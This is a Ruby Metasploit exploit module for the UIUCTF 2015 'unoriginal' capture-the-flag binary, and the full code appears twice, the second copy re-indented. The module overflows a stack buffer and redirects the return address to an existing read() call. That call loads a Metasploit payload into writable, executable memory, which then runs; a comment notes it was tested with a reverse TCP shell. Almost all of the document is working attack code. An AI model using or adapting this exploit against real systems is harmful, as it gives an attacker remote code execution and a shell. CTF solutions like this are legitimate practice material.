jgor/unoriginal.rb

## unoriginal.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'


class Metasploit4 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  def initialize
    super(
      'Name'        => 'uiuctf unoriginal',
      'Description' => %q{
        This module exploits the UIUCTF 2015 pwn - unoriginal challenge.
      },
      'Author'  => 'jgor',
      'Arch'        => ARCH_X86,
      'Platform'    => 'linux',
      'License' => MSF_LICENSE,
      'Targets' =>
        [
            [ 'Automatic', {} ],
        ]
    )

    register_options(
      [
        Opt::RPORT(1235)
      ],
      self.class
    )
  end

  def exploit

    dest = 0x08049748 # start of .data
    read_gadget = 0x0804843f # read() call within func()
    fd = 0
    read_count = payload.encoded.length + 5

    connect

    buf = ''

    # overflow buffer
    buf << "\x41" * 13

    # set up frame pointer
    buf << [dest-4].pack('L')

    # overwrite RET -> jump to existing read() call
    buf << [read_gadget].pack('L')

    # set up args to read()
    buf << [fd].pack('N') # file descriptor 0
    buf << [dest].pack('L') # start of .data (mem range is rwx)
    buf << [read_count].pack('N') # count to read

    sock.put(buf)

    buf = ''

    # return to payload 4 bytes ahead
    buf << [dest+4].pack('L')

    # msf payload (tested with linux/x86/shell/reverse_tcp)
    buf << payload.encoded

    sock.put(buf)

  end

end
	##
	# This module requires Metasploit: http://metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##


	require 'msf/core'


	class Metasploit4 < Msf::Exploit::Remote
	include Msf::Exploit::Remote::Tcp

	def initialize
	super(
	'Name' => 'uiuctf unoriginal',
	'Description' => %q{
	This module exploits the UIUCTF 2015 pwn - unoriginal challenge.
	},
	'Author' => 'jgor',
	'Arch' => ARCH_X86,
	'Platform' => 'linux',
	'License' => MSF_LICENSE,
	'Targets' =>
	[
	[ 'Automatic', {} ],
	]
	)

	register_options(
	[
	Opt::RPORT(1235)
	],
	self.class
	)
	end

	def exploit

	dest = 0x08049748 # start of .data
	read_gadget = 0x0804843f # read() call within func()
	fd = 0
	read_count = payload.encoded.length + 5

	connect

	buf = ''

	# overflow buffer
	buf << "\x41" * 13

	# set up frame pointer
	buf << [dest-4].pack('L')

	# overwrite RET -> jump to existing read() call
	buf << [read_gadget].pack('L')

	# set up args to read()
	buf << [fd].pack('N') # file descriptor 0
	buf << [dest].pack('L') # start of .data (mem range is rwx)
	buf << [read_count].pack('N') # count to read

	sock.put(buf)

	buf = ''

	# return to payload 4 bytes ahead
	buf << [dest+4].pack('L')

	# msf payload (tested with linux/x86/shell/reverse_tcp)
	buf << payload.encoded

	sock.put(buf)

	end

	end